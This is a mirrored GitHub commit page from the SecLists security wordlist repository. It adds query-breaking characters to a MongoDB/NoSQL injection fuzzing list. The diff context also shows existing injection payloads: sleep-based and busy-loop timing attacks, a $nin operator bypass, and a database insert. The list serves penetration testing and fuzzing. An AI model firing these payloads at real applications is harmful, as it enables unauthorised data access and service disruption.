mirror of
https://github.com/danielmiessler/SecLists.git
synced 2025-06-08 05:57:52 +00:00
Merge pull request #472 from righettod/master
Add characters that can break a MongoDB query when JS expression is used Source: https://github.com/Charlie-belmer/vulnerable-node-app/blob/master/app/routes/user.route.js#L8
This commit is contained in:
commit
a93ecd7f91
@ -18,3 +18,12 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
|
|||||||
';sleep(5000);
|
';sleep(5000);
|
||||||
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
|
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
|
||||||
{$nin: [""]}}
|
{$nin: [""]}}
|
||||||
|
'
|
||||||
|
"
|
||||||
|
\
|
||||||
|
/
|
||||||
|
//
|
||||||
|
;
|
||||||
|
{
|
||||||
|
}
|
||||||
|
:
|
||||||
|
Loading…
x
Reference in New Issue
Block a user